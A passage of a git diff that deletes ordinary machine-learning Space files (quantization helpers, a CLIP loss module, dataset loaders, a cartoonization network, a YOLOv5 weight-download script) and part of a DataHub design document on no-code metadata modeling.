keepdim=True)[0] - data = data * scale - data = data.clamp_(-B, B).round_().to(torch.int8) - return data, scale, original_shape - else: - B = 2**num_bits - 1 - mn = torch.min(data, dim=group_dim + 1, keepdim=True)[0] - mx = torch.max(data, dim=group_dim + 1, keepdim=True)[0] - - scale = B / (mx - mn) - data = data - mn - data.mul_(scale) - - data = data.clamp_(0, B).round_().to(torch.uint8) - return data, mn, scale, original_shape - - -def decompress(packed_data, config): - """Simulate group-wise dequantization.""" - if not config.enabled: - return packed_data - - group_size, num_bits, group_dim, symmetric = ( - config.group_size, - config.num_bits, - config.group_dim, - config.symmetric, - ) - - # Dequantize - if symmetric: - data, scale, original_shape = packed_data - data = data / scale - else: - data, mn, scale, original_shape = packed_data - data = data / scale - data.add_(mn) - - # Unpad - pad_len = (group_size - original_shape[group_dim] % group_size) % group_size - if pad_len: - padded_original_shape = ( - original_shape[:group_dim] - + (original_shape[group_dim] + pad_len,) - + original_shape[group_dim + 1 :] - ) - data = data.reshape(padded_original_shape) - indices = [slice(0, x) for x in original_shape] - return data[indices].contiguous() - else: - return data.view(original_shape) diff --git a/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/data/samplers/grouped_batch_sampler.py b/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/data/samplers/grouped_batch_sampler.py deleted file mode 100644 index 5b247730aacd04dd0c752664acde3257c4eddd71..0000000000000000000000000000000000000000 --- a/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/data/samplers/grouped_batch_sampler.py +++ /dev/null @@ -1,47 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import numpy as np -from torch.utils.data.sampler import BatchSampler, Sampler - - -class GroupedBatchSampler(BatchSampler): - """ - Wraps another sampler to yield a mini-batch of indices. - It enforces that the batch only contain elements from the same group. - It also tries to provide mini-batches which follows an ordering which is - as close as possible to the ordering from the original sampler. - """ - - def __init__(self, sampler, group_ids, batch_size): - """ - Args: - sampler (Sampler): Base sampler. - group_ids (list[int]): If the sampler produces indices in range [0, N), - `group_ids` must be a list of `N` ints which contains the group id of each sample. - The group ids must be a set of integers in the range [0, num_groups). - batch_size (int): Size of mini-batch. - """ - if not isinstance(sampler, Sampler): - raise ValueError( - "sampler should be an instance of " - "torch.utils.data.Sampler, but got sampler={}".format(sampler) - ) - self.sampler = sampler - self.group_ids = np.asarray(group_ids) - assert self.group_ids.ndim == 1 - self.batch_size = batch_size - groups = np.unique(self.group_ids).tolist() - - # buffer the indices of each group until batch size is reached - self.buffer_per_group = {k: [] for k in groups} - - def __iter__(self): - for idx in self.sampler: - group_id = self.group_ids[idx] - group_buffer = self.buffer_per_group[group_id] - group_buffer.append(idx) - if len(group_buffer) == self.batch_size: - yield group_buffer[:] # yield a copy of the list - del group_buffer[:] - - def __len__(self): - raise NotImplementedError("len() of GroupedBatchSampler is not well-defined.") diff --git a/spaces/YotamNitzan/domain-expansion/expansion_utils/clip_loss.py b/spaces/YotamNitzan/domain-expansion/expansion_utils/clip_loss.py deleted file mode 100644 index 475d2df3dfe537bf528c0bb50d94a0198f15994d..0000000000000000000000000000000000000000 --- a/spaces/YotamNitzan/domain-expansion/expansion_utils/clip_loss.py +++ /dev/null @@ -1,340 +0,0 @@ -# Based on a file from https://github.com/rinongal/StyleGAN-nada. - -# ========================================================================================== -# -# Adobe’s modifications are Copyright 2023 Adobe Research. All rights reserved. -# Adobe’s modifications are licensed under the Adobe Research License. To view a copy of the license, visit -# LICENSE.md. -# -# ========================================================================================== - -import clip -import torch -from torchvision.transforms import transforms -import numpy as np -from PIL import Image - -from expansion_utils.text_templates import imagenet_templates, part_templates - -# TODO: get rid of unused stuff in this class -class CLIPLoss(torch.nn.Module): - def __init__(self, device, lambda_direction=1., lambda_patch=0., lambda_global=0., lambda_manifold=0., - lambda_texture=0., patch_loss_type='mae', direction_loss_type='cosine', clip_model='ViT-B/32'): - super(CLIPLoss, self).__init__() - - self.device = device - self.model, clip_preprocess = clip.load(clip_model, device=self.device) - - self.clip_preprocess = clip_preprocess - - self.preprocess = transforms.Compose( - [transforms.Normalize(mean=[-1.0, -1.0, -1.0], - std=[2.0, 2.0, 2.0])] + # Un-normalize from [-1.0, 1.0] (GAN output) to [0, 1]. - clip_preprocess.transforms[:2] + # to match CLIP input scale assumptions - clip_preprocess.transforms[4:]) # + skip convert PIL to tensor - - self.target_directions_cache = {} - self.patch_text_directions = None - - self.patch_loss = DirectionLoss(patch_loss_type) - self.direction_loss = DirectionLoss(direction_loss_type) - self.patch_direction_loss = torch.nn.CosineSimilarity(dim=2) - - self.lambda_global = lambda_global - self.lambda_patch = lambda_patch - self.lambda_direction = lambda_direction - self.lambda_manifold = lambda_manifold - self.lambda_texture = lambda_texture - - self.src_text_features = None - self.target_text_features = None - self.angle_loss = torch.nn.L1Loss() - - self.model_cnn, preprocess_cnn = clip.load("RN50", device=self.device) - self.preprocess_cnn = transforms.Compose( - [transforms.Normalize(mean=[-1.0, -1.0, -1.0], - std=[2.0, 2.0, 2.0])] + # Un-normalize from [-1.0, 1.0] (GAN output) to [0, 1]. - preprocess_cnn.transforms[:2] + # to match CLIP input scale assumptions - preprocess_cnn.transforms[4:]) # + skip convert PIL to tensor - - self.model.requires_grad_(False) - self.model_cnn.requires_grad_(False) - - self.texture_loss = torch.nn.MSELoss() - - def tokenize(self, strings: list): - return clip.tokenize(strings).to(self.device) - - def encode_text(self, tokens: list) -> torch.Tensor: - return self.model.encode_text(tokens) - - def encode_images(self, images: torch.Tensor) -> torch.Tensor: - images = self.preprocess(images).to(self.device) - return self.model.encode_image(images) - - def encode_images_with_cnn(self, images: torch.Tensor) -> torch.Tensor: - images = self.preprocess_cnn(images).to(self.device) - return self.model_cnn.encode_image(images) - - def distance_with_templates(self, img: torch.Tensor, class_str: str, templates=imagenet_templates) -> torch.Tensor: - - text_features = self.get_text_features(class_str, templates) - image_features = self.get_image_features(img) - - similarity = image_features @ text_features.T - - return 1. - similarity - - def get_text_features(self, class_str: str, templates=imagenet_templates, norm: bool = True) -> torch.Tensor: - template_text = self.compose_text_with_templates(class_str, templates) - - tokens = clip.tokenize(template_text).to(self.device) - - text_features = self.encode_text(tokens).detach() - - if norm: - text_features /= text_features.norm(dim=-1, keepdim=True) - - return text_features - - def get_image_features(self, img: torch.Tensor, norm: bool = True) -> torch.Tensor: - image_features = self.encode_images(img) - - if norm: - image_features /= image_features.clone().norm(dim=-1, keepdim=True) - - return image_features - - def compute_text_direction(self, source_class: str, target_class: str) -> torch.Tensor: - with torch.no_grad(): - source_features = self.get_text_features(source_class) - target_features = self.get_text_features(target_class) - - text_direction = (target_features - source_features).mean(axis=0, keepdim=True) - text_direction /= text_direction.norm(dim=-1, keepdim=True) - - return text_direction - - def compute_img2img_direction(self, source_images: torch.Tensor, target_images: list) -> torch.Tensor: - with torch.no_grad(): - src_encoding = self.get_image_features(source_images) - src_encoding = src_encoding.mean(dim=0, keepdim=True) - - target_encodings = [] - for target_img in target_images: - preprocessed = self.clip_preprocess(Image.open(target_img)).unsqueeze(0).to(self.device) - - encoding = self.model.encode_image(preprocessed) - encoding /= encoding.norm(dim=-1, keepdim=True) - - target_encodings.append(encoding) - - target_encoding = torch.cat(target_encodings, axis=0) - target_encoding = target_encoding.mean(dim=0, keepdim=True) - - direction = target_encoding - src_encoding - direction /= direction.norm(dim=-1, keepdim=True) - - return direction - - def set_text_features(self, source_class: str, target_class: str) -> None: - source_features = self.get_text_features(source_class).mean(axis=0, keepdim=True) - self.src_text_features = source_features / source_features.norm(dim=-1, keepdim=True) - - target_features = self.get_text_features(target_class).mean(axis=0, keepdim=True) - self.target_text_features = target_features / target_features.norm(dim=-1, keepdim=True) - - def clip_angle_loss(self, src_img: torch.Tensor, source_class: str, target_img: torch.Tensor, - target_class: str) -> torch.Tensor: - if self.src_text_features is None: - self.set_text_features(source_class, target_class) - - cos_text_angle = self.target_text_features @ self.src_text_features.T - text_angle = torch.acos(cos_text_angle) - - src_img_features = self.get_image_features(src_img).unsqueeze(2) - target_img_features = self.get_image_features(target_img).unsqueeze(1) - - cos_img_angle = torch.clamp(target_img_features @ src_img_features, min=-1.0, max=1.0) - img_angle = torch.acos(cos_img_angle) - - text_angle = text_angle.unsqueeze(0).repeat(img_angle.size()[0], 1, 1) - cos_text_angle = cos_text_angle.unsqueeze(0).repeat(img_angle.size()[0], 1, 1) - - return self.angle_loss(cos_img_angle, cos_text_angle) - - def compose_text_with_templates(self, text: str, templates=imagenet_templates) -> list: - return [template.format(text) for template in templates] - - def clip_directional_loss(self, src_img: torch.Tensor, source_classes: np.ndarray, target_img: torch.Tensor, - target_classes: np.ndarray) -> torch.Tensor: - - target_directions = [] - for key in zip(source_classes, target_classes): - if key not in self.target_directions_cache.keys(): - new_direction = self.compute_text_direction(*key) - self.target_directions_cache[key] = new_direction - - target_directions.append(self.target_directions_cache[key]) - target_directions = torch.cat(target_directions) - - src_encoding = self.get_image_features(src_img) - target_encoding = self.get_image_features(target_img) - - edit_direction = (target_encoding - src_encoding) - if edit_direction.sum() == 0: - target_encoding = self.get_image_features(target_img + 1e-6) - edit_direction = (target_encoding - src_encoding) - - edit_direction /= (edit_direction.clone().norm(dim=-1, keepdim=True)) - - return self.direction_loss(edit_direction, target_directions).sum() - - def global_clip_loss(self, img: torch.Tensor, text) -> torch.Tensor: - if not isinstance(text, list): - text = [text] - - tokens = clip.tokenize(text).to(self.device) - image = self.preprocess(img) - - logits_per_image, _ = self.model(image, tokens) - - return (1. - logits_per_image / 100).mean() - - def random_patch_centers(self, img_shape, num_patches, size): - batch_size, channels, height, width = img_shape - - half_size = size // 2 - patch_centers = np.concatenate( - [np.random.randint(half_size, width - half_size, size=(batch_size * num_patches, 1)), - np.random.randint(half_size, height - half_size, size=(batch_size * num_patches, 1))], axis=1) - - return patch_centers - - def generate_patches(self, img: torch.Tensor, patch_centers, size): - batch_size = img.shape[0] - num_patches = len(patch_centers) // batch_size - half_size = size // 2 - - patches = [] - - for batch_idx in range(batch_size): - for patch_idx in range(num_patches): - center_x = patch_centers[batch_idx * num_patches + patch_idx][0] - center_y = patch_centers[batch_idx * num_patches + patch_idx][1] - - patch = img[batch_idx:batch_idx + 1, :, center_y - half_size:center_y + half_size, - center_x - half_size:center_x + half_size] - - patches.append(patch) - - patches = torch.cat(patches, axis=0) - - return patches - - def patch_scores(self, img: torch.Tensor, class_str: str, patch_centers, patch_size: int) -> torch.Tensor: - - parts = self.compose_text_with_templates(class_str, part_templates) - tokens = clip.tokenize(parts).to(self.device) - text_features = self.encode_text(tokens).detach() - - patches = self.generate_patches(img, patch_centers, patch_size) - image_features = self.get_image_features(patches) - - similarity = image_features @ text_features.T - - return similarity - - def clip_patch_similarity(self, src_img: torch.Tensor, source_class: str, target_img: torch.Tensor, - target_class: str) -> torch.Tensor: - patch_size = 196 # TODO remove magic number - - patch_centers = self.random_patch_centers(src_img.shape, 4, patch_size) # TODO remove magic number - - src_scores = self.patch_scores(src_img, source_class, patch_centers, patch_size) - target_scores = self.patch_scores(target_img, target_class, patch_centers, patch_size) - - return self.patch_loss(src_scores, target_scores) - - def patch_directional_loss(self, src_img: torch.Tensor, source_class: str, target_img: torch.Tensor, - target_class: str) -> torch.Tensor: - - if self.patch_text_directions is None: - src_part_classes = self.compose_text_with_templates(source_class, part_templates) - target_part_classes = self.compose_text_with_templates(target_class, part_templates) - - parts_classes = list(zip(src_part_classes, target_part_classes)) - - self.patch_text_directions = torch.cat( - [self.compute_text_direction(pair[0], pair[1]) for pair in parts_classes], dim=0) - - patch_size = 510 # TODO remove magic numbers - - patch_centers = self.random_patch_centers(src_img.shape, 1, patch_size) - - patches = self.generate_patches(src_img, patch_centers, patch_size) - src_features = self.get_image_features(patches) - - patches = self.generate_patches(target_img, patch_centers, patch_size) - target_features = self.get_image_features(patches) - - edit_direction = (target_features - src_features) - edit_direction /= edit_direction.clone().norm(dim=-1, keepdim=True) - - cosine_dists = 1. - self.patch_direction_loss(edit_direction.unsqueeze(1), - self.patch_text_directions.unsqueeze(0)) - - patch_class_scores = cosine_dists * (edit_direction @ self.patch_text_directions.T).softmax(dim=-1) - - return patch_class_scores.mean() - - def cnn_feature_loss(self, src_img: torch.Tensor, target_img: torch.Tensor) -> torch.Tensor: - src_features = self.encode_images_with_cnn(src_img) - target_features = self.encode_images_with_cnn(target_img) - - return self.texture_loss(src_features, target_features) - - def forward(self, src_img: torch.Tensor, source_class: str, target_img: torch.Tensor, target_class: str, - texture_image: torch.Tensor = None): - clip_loss = 0.0 - - if self.lambda_global: - clip_loss += self.lambda_global * self.global_clip_loss(target_img, [f"a {target_class}"]) - - if self.lambda_patch: # IMO Same directional loss but run on patches - clip_loss += self.lambda_patch * self.patch_directional_loss(src_img, source_class, target_img, - target_class) - - if self.lambda_direction: # The directional loss used in the paper - clip_loss += self.lambda_direction * self.clip_directional_loss(src_img, source_class, target_img, - target_class) - - if self.lambda_manifold: # Compute angels of text and image directions and do L1 - clip_loss += self.lambda_manifold * self.clip_angle_loss(src_img, source_class, target_img, target_class) - - if self.lambda_texture and (texture_image is not None): # L2 on features extracted by a CNN - clip_loss += self.lambda_texture * self.cnn_feature_loss(texture_image, target_img) - - return clip_loss - - -class DirectionLoss(torch.nn.Module): - - def __init__(self, loss_type='mse'): - super(DirectionLoss, self).__init__() - - self.loss_type = loss_type - - self.loss_func = { - 'mse': torch.nn.MSELoss, - 'cosine': torch.nn.CosineSimilarity, - 'mae': torch.nn.L1Loss - }[loss_type]() - - def forward(self, x, y): - if self.loss_type == "cosine": - return 1. - self.loss_func(x, y) - - return self.loss_func(x, y) - - diff --git a/spaces/YotamNitzan/domain-expansion/spinup.sh b/spaces/YotamNitzan/domain-expansion/spinup.sh deleted file mode 100644 index be1c2e7308395864ff89826a29e3a741294a670c..0000000000000000000000000000000000000000 --- a/spaces/YotamNitzan/domain-expansion/spinup.sh +++ /dev/null @@ -1,6 +0,0 @@ -MY_UID="$(id -u)" MY_GID="$(id -g)" docker-compose build -MY_UID="$(id -u)" MY_GID="$(id -g)" docker-compose run --service-ports alv_domain - - -# python3.8 generate_aligned.py --ckpt "./ffhq100.pkl" --out_dir "./out" --num 2 --truncation_psi -# python generate_aligned.py --ckpt "./afhqdog.pkl" --out_dir "./out" --num 2 --truncation_psi \ No newline at end of file diff --git a/spaces/YuAnthony/Audio-Caption/data_handling/clotho_dataset.py b/spaces/YuAnthony/Audio-Caption/data_handling/clotho_dataset.py deleted file mode 100644 index 880b716ec65d9373fdf095c65d6a65081d7cb0d1..0000000000000000000000000000000000000000 --- a/spaces/YuAnthony/Audio-Caption/data_handling/clotho_dataset.py +++ /dev/null @@ -1,166 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- - -from typing import Tuple, List, AnyStr, Union -from pathlib import Path - -from numpy import ndarray, recarray -from torch.utils.data import Dataset -from numpy import load as np_load - -import torch -import numpy as np -import os - -__author__ = 'Konstantinos Drossos -- Tampere University' -__docformat__ = 'reStructuredText' -__all__ = ['ClothoDataset'] - - -class ClothoDataset(Dataset): - - def __init__(self, data_dir: Path, - split: AnyStr, - input_field_name: AnyStr, - output_field_name: AnyStr, - load_into_memory: bool) \ - -> None: - """Initialization of a Clotho dataset object. - - :param data_dir: Directory with data. - :type data_dir: pathlib.Path - :param split: Split to use (i.e. 'development', 'evaluation') - :type split: str - :param input_field_name: Field name of the clotho data\ - to be used as input data to the\ - method. - :type input_field_name: str - :param output_field_name: Field name of the clotho data\ - to be used as output data to the\ - method. - :type output_field_name: str - :param load_into_memory: Load all data into memory? - :type load_into_memory: bool - """ - super(ClothoDataset, self).__init__() - the_dir: Path = data_dir.joinpath(split) - - self.examples: List[Path] = sorted(the_dir.iterdir()) - self.input_name: str = input_field_name - self.output_name: str = output_field_name - self.load_into_memory: bool = load_into_memory - - if load_into_memory: - self.examples: List[recarray] = [np_load(str(f), allow_pickle=True) - for f in self.examples] - - def __len__(self) \ - -> int: - """Gets the amount of examples in the dataset. - - :return: Amount of examples in the dataset. - :rtype: int - """ - return len(self.examples) - - def __getitem__(self, - item: int) \ - -> Tuple[ndarray, ndarray]: - """Gets an example from the dataset. - - :param item: Index of the item. - :type item: int - :return: Input and output values. - :rtype: numpy.ndarray. numpy.ndarray - """ - ex: Union[Path, recarray] = self.examples[item] - if not self.load_into_memory: - ex: recarray = np_load(str(ex), allow_pickle=True) - - in_e, ou_e = [ex[i].item() for i in [self.input_name, self.output_name]] - - return in_e, ou_e - - -class ClothoDatasetEval(Dataset): - - def __init__(self, data_dir: Path, - split: AnyStr, - input_field_name: AnyStr, - output_field_name: AnyStr, - load_into_memory: bool) \ - -> None: - """Initialization of a Clotho dataset object. - - :param data_dir: Directory with data. - :type data_dir: pathlib.Path - :param split: Split to use (i.e. 'development', 'evaluation') - :type split: str - :param input_field_name: Field name of the clotho data\ - to be used as input data to the\ - method. - :type input_field_name: str - :param output_field_name: Field name of the clotho data\ - to be used as output data to the\ - method. - :type output_field_name: str - :param load_into_memory: Load all data into memory? - :type load_into_memory: bool - """ - super(ClothoDatasetEval, self).__init__() - the_dir: Path = data_dir.joinpath(split) - if split == 'evaluation': - self.examples: List[Path] = sorted(the_dir.iterdir())[::5] # changed - else: - self.examples: List[Path] = sorted(the_dir.iterdir()) # changed - # self.examples: List[Path] = sorted(the_dir.iterdir()) - self.input_name: str = input_field_name - self.output_name: str = output_field_name - self.load_into_memory: bool = load_into_memory - self.data_dir = the_dir - - if load_into_memory: - self.examples: List[recarray] = [np_load(str(f), allow_pickle=True) - for f in self.examples] - - def __len__(self) \ - -> int: - """Gets the amount of examples in the dataset. - - :return: Amount of examples in the dataset. - :rtype: int - """ - return len(self.examples) - - def __getitem__(self, - item: int): - """Gets an example from the dataset. - - :param item: Index of the item. - :type item: int - :return: Input and output values. - :rtype: numpy.ndarray. numpy.ndarray - """ - ex: Union[Path, recarray] = self.examples[item] - if not self.load_into_memory: - ex: recarray = np_load(str(ex), allow_pickle=True) - - in_e, ou_e = [ex[i].item() for i in [self.input_name, self.output_name]] - - all_ref = get_all_ref(ex['file_name'].item(), self.data_dir) - - filename = str(ex['file_name'].item()) - out_len = len(ou_e) - return in_e, ou_e, all_ref, filename,out_len - - -def get_all_ref(filename, data_dir): - filename = str(filename) - # tgt = [np.load(d, allow_pickle=True).words_ind.tolist() - tgt = [np.load(d, allow_pickle=True)['words_ind'].item().tolist() - for d in [os.path.join(data_dir, 'clotho_file_{filename}.wav_{i}.npy'. - format(filename=filename[:-4], # 删除'.wav' - i=i)) for i in range(5)] # wav_0-wav_4 - ] - return tgt -# EOF diff --git a/spaces/Yukki-Yui/White-box-Cartoonization/wbc/network.py b/spaces/Yukki-Yui/White-box-Cartoonization/wbc/network.py deleted file mode 100644 index 6f16cee1aa1994d0a78c524f459764de5164e637..0000000000000000000000000000000000000000 --- a/spaces/Yukki-Yui/White-box-Cartoonization/wbc/network.py +++ /dev/null @@ -1,62 +0,0 @@ -import tensorflow as tf -import numpy as np -import tensorflow.contrib.slim as slim - - - -def resblock(inputs, out_channel=32, name='resblock'): - - with tf.variable_scope(name): - - x = slim.convolution2d(inputs, out_channel, [3, 3], - activation_fn=None, scope='conv1') - x = tf.nn.leaky_relu(x) - x = slim.convolution2d(x, out_channel, [3, 3], - activation_fn=None, scope='conv2') - - return x + inputs - - - - -def unet_generator(inputs, channel=32, num_blocks=4, name='generator', reuse=False): - with tf.variable_scope(name, reuse=reuse): - - x0 = slim.convolution2d(inputs, channel, [7, 7], activation_fn=None) - x0 = tf.nn.leaky_relu(x0) - - x1 = slim.convolution2d(x0, channel, [3, 3], stride=2, activation_fn=None) - x1 = tf.nn.leaky_relu(x1) - x1 = slim.convolution2d(x1, channel*2, [3, 3], activation_fn=None) - x1 = tf.nn.leaky_relu(x1) - - x2 = slim.convolution2d(x1, channel*2, [3, 3], stride=2, activation_fn=None) - x2 = tf.nn.leaky_relu(x2) - x2 = slim.convolution2d(x2, channel*4, [3, 3], activation_fn=None) - x2 = tf.nn.leaky_relu(x2) - - for idx in range(num_blocks): - x2 = resblock(x2, out_channel=channel*4, name='block_{}'.format(idx)) - - x2 = slim.convolution2d(x2, channel*2, [3, 3], activation_fn=None) - x2 = tf.nn.leaky_relu(x2) - - h1, w1 = tf.shape(x2)[1], tf.shape(x2)[2] - x3 = tf.image.resize_bilinear(x2, (h1*2, w1*2)) - x3 = slim.convolution2d(x3+x1, channel*2, [3, 3], activation_fn=None) - x3 = tf.nn.leaky_relu(x3) - x3 = slim.convolution2d(x3, channel, [3, 3], activation_fn=None) - x3 = tf.nn.leaky_relu(x3) - - h2, w2 = tf.shape(x3)[1], tf.shape(x3)[2] - x4 = tf.image.resize_bilinear(x3, (h2*2, w2*2)) - x4 = slim.convolution2d(x4+x0, channel, [3, 3], activation_fn=None) - x4 = tf.nn.leaky_relu(x4) - x4 = slim.convolution2d(x4, 3, [7, 7], activation_fn=None) - - return x4 - -if __name__ == '__main__': - - - pass \ No newline at end of file diff --git a/spaces/Zengyf-CVer/Gradio_YOLOv5_Det_v3/model_download/yolov5_model_p5_n.sh b/spaces/Zengyf-CVer/Gradio_YOLOv5_Det_v3/model_download/yolov5_model_p5_n.sh deleted file mode 100644 index 5fc6d093f4b92e1ad735f8b513d01d95f4d53d5c..0000000000000000000000000000000000000000 --- a/spaces/Zengyf-CVer/Gradio_YOLOv5_Det_v3/model_download/yolov5_model_p5_n.sh +++ /dev/null @@ -1,4 +0,0 @@ -cd ./yolov5 - -# 下载YOLOv5模型 -wget -c -t 0 https://github.com/ultralytics/yolov5/releases/download/v6.1/yolov5n.pt diff --git a/spaces/abdvl/datahub_qa_bot/docs/advanced/no-code-modeling.md b/spaces/abdvl/datahub_qa_bot/docs/advanced/no-code-modeling.md deleted file mode 100644 index e1fadee6d371a4a6a816a3d0f1562fdda535c0fe..0000000000000000000000000000000000000000 --- a/spaces/abdvl/datahub_qa_bot/docs/advanced/no-code-modeling.md +++ /dev/null @@ -1,403 +0,0 @@ -# No Code Metadata - -## Summary of changes - -As part of the No Code Metadata Modeling initiative, we've made radical changes to the DataHub stack. - -Specifically, we've - -- Decoupled the persistence layer from Java + Rest.li specific concepts -- Consolidated the per-entity Rest.li resources into a single general-purpose Entity Resource -- Consolidated the per-entity Graph Index Writers + Readers into a single general-purpose Neo4J DAO -- Consolidated the per-entity Search Index Writers + Readers into a single general-purpose ES DAO. -- Developed mechanisms for declaring search indexing configurations + foreign key relationships as annotations -on PDL models themselves. -- Introduced a special "Browse Paths" aspect that allows the browse configuration to be -pushed into DataHub, as opposed to computed in a blackbox lambda sitting within DataHub -- Introduced special "Key" aspects for conveniently representing the information that identifies a DataHub entities via -a normal struct. -- Removed the need for hand-written Elastic `settings.json` and `mappings.json`. (Now generated at runtime) -- Removed the need for the Elastic Set Up container (indexes are not registered at runtime) -- Simplified the number of models that need to be maintained for each DataHub entity. We removed the need for - 1. Relationship Models - 2. Entity Models - 3. Urn models + the associated Java container classes - 4. 'Value' models, those which are returned by the Rest.li resource - -In doing so, dramatically reducing the level of effort required to add or extend an existing entity. - -For more on the design considerations, see the **Design** section below. - - -## Engineering Spec - -This section will provide a more in-depth overview of the design considerations that were at play when working on the No -Code initiative. - -# Use Cases - -Who needs what & why? - -| As a | I want to | because -| ---------------- | ------------------------ | ------------------------------ -| DataHub Operator | Add new entities | The default domain model does not match my business needs -| DataHub Operator | Extend existing entities | The default domain model does not match my business needs - -What we heard from folks in the community is that adding new entities + aspects is just **too difficult**. - -They'd be happy if this process was streamlined and simple. **Extra** happy if there was no chance of merge conflicts in the future. (no fork necessary) - -# Goals - -### Primary Goal - -**Reduce the friction** of adding new entities, aspects, and relationships. - -### Secondary Goal - -Achieve the primary goal in a way that does not require a fork. - -# Requirements - -### Must-Haves - -1. Mechanisms for **adding** a browsable, searchable, linkable GMS entity by defining one or more PDL models - - GMS Endpoint for fetching entity - - GMS Endpoint for fetching entity relationships - - GMS Endpoint for searching entity - - GMS Endpoint for browsing entity -2. Mechanisms for **extending** a ****browsable, searchable, linkable GMS ****entity by defining one or more PDL models - - GMS Endpoint for fetching entity - - GMS Endpoint for fetching entity relationships - - GMS Endpoint for searching entity - - GMS Endpoint for browsing entity -3. Mechanisms + conventions for introducing a new **relationship** between 2 GMS entities without writing code -4. Clear documentation describing how to perform actions in #1, #2, and #3 above published on [datahubproject.io](http://datahubproject.io) - -## Nice-to-haves - -1. Mechanisms for automatically generating a working GraphQL API using the entity PDL models -2. Ability to add / extend GMS entities without a fork. - - e.g. **Register** new entity / extensions *at runtime*. (Unlikely due to code generation) - - or, **configure** new entities at *deploy time* - -## What Success Looks Like - -1. Adding a new browsable, searchable entity to GMS (not DataHub UI / frontend) takes 1 dev < 15 minutes. -2. Extending an existing browsable, searchable entity in GMS takes 1 dev < 15 minutes -3. Adding a new relationship among 2 GMS entities takes 1 dev < 15 minutes -4. [Bonus] Implementing the `datahub-frontend` GraphQL API for a new / extended entity takes < 10 minutes - - -## Design - -## State of the World - -### Modeling - -Currently, there are various models in GMS: - -1. [Urn](https://github.com/datahub-project/datahub/blob/master/li-utils/src/main/pegasus/com/linkedin/common/DatasetUrn.pdl) - Structs composing primary keys -2. [Root] [Snapshots](https://github.com/datahub-project/datahub/blob/master/metadata-models/src/main/pegasus/com/linkedin/metadata/snapshot/Snapshot.pdl) - Container of aspects -3. [Aspects](https://github.com/datahub-project/datahub/blob/master/metadata-models/src/main/pegasus/com/linkedin/metadata/aspect/DashboardAspect.pdl) - Optional container of fields -4. [Values](https://github.com/datahub-project/datahub/blob/master/gms/api/src/main/pegasus/com/linkedin/dataset/Dataset.pdl), [Keys](https://github.com/datahub-project/datahub/blob/master/gms/api/src/main/pegasus/com/linkedin/dataset/DatasetKey.pdl) - Model returned by GMS [Rest.li](http://rest.li) API (public facing) -5. [Entities](https://github.com/datahub-project/datahub/blob/master/metadata-models/src/main/pegasus/com/linkedin/metadata/entity/DatasetEntity.pdl) - Records with fields derived from the URN. Used only in graph / relationships -6. [Relationships](https://github.com/datahub-project/datahub/blob/master/metadata-models/src/main/pegasus/com/linkedin/metadata/relationship/Relationship.pdl) - Edges between 2 entities with optional edge properties -7. [Search Documents](https://github.com/datahub-project/datahub/blob/master/metadata-models/src/main/pegasus/com/linkedin/metadata/search/ChartDocument.pdl) - Flat documents for indexing within Elastic index - - And corresponding index [mappings.json](https://github.com/datahub-project/datahub/blob/master/gms/impl/src/main/resources/index/chart/mappings.json), [settings.json](https://github.com/datahub-project/datahub/blob/master/gms/impl/src/main/resources/index/chart/settings.json) - -Various components of GMS depend on / make assumptions about these model types: - -1. IndexBuilders depend on **Documents** -2. GraphBuilders depend on **Snapshots** -3. RelationshipBuilders depend on **Aspects** -4. Mae Processor depend on **Snapshots, Documents, Relationships** -5. Mce Processor depend on **Snapshots, Urns** -6. [Rest.li](http://rest.li) Resources on **Documents, Snapshots, Aspects, Values, Urns** -7. Graph Reader Dao (BaseQueryDao) depends on **Relationships, Entity** -8. Graph Writer Dao (BaseGraphWriterDAO) depends on **Relationships, Entity** -9. Local Dao Depends on **aspects, urns** -10. Search Dao depends on **Documents** - -Additionally, there are some implicit concepts that require additional caveats / logic: - -1. Browse Paths - Requires defining logic in an entity-specific index builder to generate. -2. Urns - Requires defining a) an Urn PDL model and b) a hand-written Urn class - -As you can see, there are many tied up concepts. Fundamentally changing the model would require a serious amount of refactoring, as it would require new versions of numerous components. - -The challenge is, how can we meet the requirements without fundamentally altering the model? - -## Proposed Solution - -In a nutshell, the idea is to consolidate the number of models + code we need to write on a per-entity basis. -We intend to achieve this by making search index + relationship configuration declarative, specified as part of the model -definition itself. - -We will use this configuration to drive more generic versions of the index builders + rest resources, -with the intention of reducing the overall surface area of GMS. - -During this initiative, we will also seek to make the concepts of Browse Paths and Urns declarative. Browse Paths -will be provided using a special BrowsePaths aspect. Urns will no longer be strongly typed. - -To achieve this, we will attempt to generify many components throughout the stack. Currently, many of them are defined on -a *per-entity* basis, including - -- Rest.li Resources -- Index Builders -- Graph Builders -- Local, Search, Browse, Graph DAOs -- Clients -- Browse Path Logic - -along with simplifying the number of raw data models that need defined, including - -- Rest.li Resource Models -- Search Document Models -- Relationship Models -- Urns + their java classes - -From an architectural PoV, we will move from a before that looks something like this: - -![no-code-before](../imgs/no-code-before.png) - -to an after that looks like this - -![no-code-after](../imgs/no-code-after.png) - -That is, a move away from patterns of strong-typing-everywhere to a more generic + flexible world. - -### How will we do it? - -We will accomplish this by building the following: - -1. Set of custom annotations to permit declarative entity, search, graph configurations - - @Entity & @Aspect - - @Searchable - - @Relationship -2. Entity Registry: In-memory structures for representing, storing & serving metadata associated with a particular Entity, including search and relationship configurations. -3. Generic Entity, Search, Graph Service classes: Replaces traditional strongly-typed DAOs with flexible, pluggable APIs that can be used for CRUD, search, and graph across all entities. -2. Generic Rest.li Resources: - - 1 permitting reading, writing, searching, autocompleting, and browsing arbitrary entities - - 1 permitting reading of arbitrary entity-entity relationship edges -2. Generic Search Index Builder: Given a MAE and a specification of the Search Configuration for an entity, updates the search index. -3. Generic Graph Index Builder: Given a MAE and a specification of the Relationship Configuration for an entity, updates the graph index. -4. Generic Index + Mappings Builder: Dynamically generates index mappings and creates indices on the fly. -5. Introduce of special aspects to address other imperative code requirements - - BrowsePaths Aspect: Include an aspect to permit customization of the indexed browse paths. - - Key aspects: Include "virtual" aspects for representing the fields that uniquely identify an Entity for easy - reading by clients of DataHub. - -### Final Developer Experience: Defining an Entity - -We will outline what the experience of adding a new Entity should look like. We will imagine we want to define a "Service" entity representing -online microservices. - -#### Step 1. Add aspects - -ServiceKey.pdl - -``` -namespace com.linkedin.metadata.key - -/** - * 